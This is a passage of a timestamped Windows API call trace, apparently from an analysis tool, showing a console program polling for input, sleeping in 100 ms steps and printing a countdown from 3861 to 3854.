[0225.195] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0225.195] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603b
[0225.195] Sleep (dwMilliseconds=0x64)
[0225.304] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0225.304] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603b
[0225.304] Sleep (dwMilliseconds=0x64)
[0225.413] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0225.414] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603b
[0225.414] Sleep (dwMilliseconds=0x64)
[0225.523] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0225.523] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603c
[0225.523] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083861") returned 8
[0225.523] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0225.523] __iob_func () returned 0x757a2900
[0225.523] _fileno (_File=0x757a2920) returned 1
[0225.523] _errno () returned 0x5507d8
[0225.523] _get_osfhandle (_FileHandle=1) returned 0x4c
[0225.523] _errno () returned 0x5507d8
[0225.523] GetFileType (hFile=0x4c) returned 0x2
[0225.523] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0225.523] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0225.523] lstrlenW (lpString="\x08\x08\x08\x083861") returned 8
[0225.632] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0225.632] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603c
[0225.632] Sleep (dwMilliseconds=0x64)
[0225.741] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0225.741] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603c
[0225.741] Sleep (dwMilliseconds=0x64)
[0225.850] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0225.850] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603c
[0225.850] Sleep (dwMilliseconds=0x64)
[0225.959] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0225.959] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603c
[0225.959] Sleep (dwMilliseconds=0x64)
[0226.084] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0226.084] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603c
[0226.084] Sleep (dwMilliseconds=0x64)
[0226.193] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0226.194] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603c
[0226.194] Sleep (dwMilliseconds=0x64)
[0226.303] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0226.303] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603c
[0226.303] Sleep (dwMilliseconds=0x64)
[0226.412] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0226.412] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603c
[0226.412] Sleep (dwMilliseconds=0x64)
[0226.521] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0226.521] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603d
[0226.521] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083860") returned 8
[0226.521] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0226.522] __iob_func () returned 0x757a2900
[0226.522] _fileno (_File=0x757a2920) returned 1
[0226.522] _errno () returned 0x5507d8
[0226.522] _get_osfhandle (_FileHandle=1) returned 0x4c
[0226.522] _errno () returned 0x5507d8
[0226.522] GetFileType (hFile=0x4c) returned 0x2
[0226.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0226.522] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0226.522] lstrlenW (lpString="\x08\x08\x08\x083860") returned 8
[0226.630] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0226.631] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603d
[0226.631] Sleep (dwMilliseconds=0x64)
[0226.740] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0226.740] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603d
[0226.740] Sleep (dwMilliseconds=0x64)
[0226.849] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0226.849] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603d
[0226.849] Sleep (dwMilliseconds=0x64)
[0226.958] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0226.958] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603d
[0226.958] Sleep (dwMilliseconds=0x64)
[0227.067] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0227.067] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603d
[0227.067] Sleep (dwMilliseconds=0x64)
[0227.176] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0227.177] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603d
[0227.177] Sleep (dwMilliseconds=0x64)
[0227.285] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0227.286] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603d
[0227.286] Sleep (dwMilliseconds=0x64)
[0227.395] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0227.395] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603d
[0227.395] Sleep (dwMilliseconds=0x64)
[0227.504] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0227.504] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603e
[0227.504] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083859") returned 8
[0227.504] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0227.504] __iob_func () returned 0x757a2900
[0227.504] _fileno (_File=0x757a2920) returned 1
[0227.504] _errno () returned 0x5507d8
[0227.504] _get_osfhandle (_FileHandle=1) returned 0x4c
[0227.504] _errno () returned 0x5507d8
[0227.504] GetFileType (hFile=0x4c) returned 0x2
[0227.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0227.504] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0227.505] lstrlenW (lpString="\x08\x08\x08\x083859") returned 8
[0227.613] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0227.613] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603e
[0227.614] Sleep (dwMilliseconds=0x64)
[0227.722] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0227.722] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603e
[0227.722] Sleep (dwMilliseconds=0x64)
[0227.832] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0227.832] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603e
[0227.832] Sleep (dwMilliseconds=0x64)
[0227.941] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0227.941] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603e
[0227.941] Sleep (dwMilliseconds=0x64)
[0228.050] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0228.050] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603e
[0228.050] Sleep (dwMilliseconds=0x64)
[0228.160] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0228.160] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603e
[0228.160] Sleep (dwMilliseconds=0x64)
[0228.268] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0228.268] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603e
[0228.269] Sleep (dwMilliseconds=0x64)
[0228.377] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0228.378] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603e
[0228.378] Sleep (dwMilliseconds=0x64)
[0228.493] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0228.493] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603f
[0228.493] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083858") returned 8
[0228.493] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0228.493] __iob_func () returned 0x757a2900
[0228.493] _fileno (_File=0x757a2920) returned 1
[0228.493] _errno () returned 0x5507d8
[0228.493] _get_osfhandle (_FileHandle=1) returned 0x4c
[0228.493] _errno () returned 0x5507d8
[0228.493] GetFileType (hFile=0x4c) returned 0x2
[0228.493] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0228.493] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0228.493] lstrlenW (lpString="\x08\x08\x08\x083858") returned 8
[0228.596] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0228.596] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603f
[0228.596] Sleep (dwMilliseconds=0x64)
[0228.705] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0228.705] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603f
[0228.705] Sleep (dwMilliseconds=0x64)
[0228.814] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0228.814] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603f
[0228.814] Sleep (dwMilliseconds=0x64)
[0228.923] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0228.924] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603f
[0228.924] Sleep (dwMilliseconds=0x64)
[0229.033] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0229.033] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603f
[0229.033] Sleep (dwMilliseconds=0x64)
[0229.142] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0229.142] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603f
[0229.142] Sleep (dwMilliseconds=0x64)
[0229.251] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0229.251] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603f
[0229.251] Sleep (dwMilliseconds=0x64)
[0229.360] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0229.361] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd603f
[0229.361] Sleep (dwMilliseconds=0x64)
[0229.475] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0229.476] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6040
[0229.476] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083857") returned 8
[0229.476] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0229.476] __iob_func () returned 0x757a2900
[0229.476] _fileno (_File=0x757a2920) returned 1
[0229.476] _errno () returned 0x5507d8
[0229.476] _get_osfhandle (_FileHandle=1) returned 0x4c
[0229.476] _errno () returned 0x5507d8
[0229.476] GetFileType (hFile=0x4c) returned 0x2
[0229.476] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0229.476] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0229.476] lstrlenW (lpString="\x08\x08\x08\x083857") returned 8
[0229.610] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0229.610] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6040
[0229.610] Sleep (dwMilliseconds=0x64)
[0229.750] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0229.750] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6040
[0229.750] Sleep (dwMilliseconds=0x64)
[0229.876] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0229.876] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6040
[0229.876] Sleep (dwMilliseconds=0x64)
[0230.016] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0230.016] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6040
[0230.016] Sleep (dwMilliseconds=0x64)
[0230.156] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0230.156] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6040
[0230.156] Sleep (dwMilliseconds=0x64)
[0230.296] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0230.296] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6040
[0230.296] Sleep (dwMilliseconds=0x64)
[0230.468] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0230.468] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6041
[0230.468] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083856") returned 8
[0230.468] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0230.468] __iob_func () returned 0x757a2900
[0230.468] _fileno (_File=0x757a2920) returned 1
[0230.468] _errno () returned 0x5507d8
[0230.468] _get_osfhandle (_FileHandle=1) returned 0x4c
[0230.468] _errno () returned 0x5507d8
[0230.468] GetFileType (hFile=0x4c) returned 0x2
[0230.468] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0230.468] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0230.468] lstrlenW (lpString="\x08\x08\x08\x083856") returned 8
[0230.624] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0230.624] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6041
[0230.624] Sleep (dwMilliseconds=0x64)
[0230.811] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0230.811] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6041
[0230.811] Sleep (dwMilliseconds=0x64)
[0230.998] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0230.998] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6041
[0230.998] Sleep (dwMilliseconds=0x64)
[0231.201] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0231.201] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6041
[0231.201] Sleep (dwMilliseconds=0x64)
[0231.342] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0231.343] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6041
[0231.343] Sleep (dwMilliseconds=0x64)
[0231.497] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0231.497] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6042
[0231.497] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083855") returned 8
[0231.497] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0231.498] __iob_func () returned 0x757a2900
[0231.498] _fileno (_File=0x757a2920) returned 1
[0231.498] _errno () returned 0x5507d8
[0231.498] _get_osfhandle (_FileHandle=1) returned 0x4c
[0231.498] _errno () returned 0x5507d8
[0231.498] GetFileType (hFile=0x4c) returned 0x2
[0231.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0231.498] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0231.498] lstrlenW (lpString="\x08\x08\x08\x083855") returned 8
[0231.608] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0231.609] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6042
[0231.609] Sleep (dwMilliseconds=0x64)
[0231.747] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0231.747] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6042
[0231.747] Sleep (dwMilliseconds=0x64)
[0231.887] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0231.887] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6042
[0231.887] Sleep (dwMilliseconds=0x64)
[0232.028] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0232.028] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6042
[0232.028] Sleep (dwMilliseconds=0x64)
[0232.168] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0232.168] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6042
[0232.168] Sleep (dwMilliseconds=0x64)
[0232.295] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0232.295] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6042
[0232.295] Sleep (dwMilliseconds=0x64)
[0232.418] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0232.418] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6042
[0232.418] Sleep (dwMilliseconds=0x64)
[0232.527] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0232.527] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6043
[0232.527] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083854") returned 8
[0232.527] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0232.527] __iob_func () returned 0x757a2900
[0232.527] _fileno (_File=0x757a2920) returned 1
[0232.527] _errno () returned 0x5507d8
[0232.527] _get_osfhandle (_FileHandle=1) returned 0x4c
[0232.527] _errno () returned 0x5507d8
[0232.527] GetFileType (hFile=0x4c) returned 0x2
[0232.527] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0232.528] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0232.528] lstrlenW (lpString="\x08\x08\x08\x083854") returned 8
[0232.636] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0232.636] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6043
[0232.636] Sleep (dwMilliseconds=0x64)
[0232.746] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
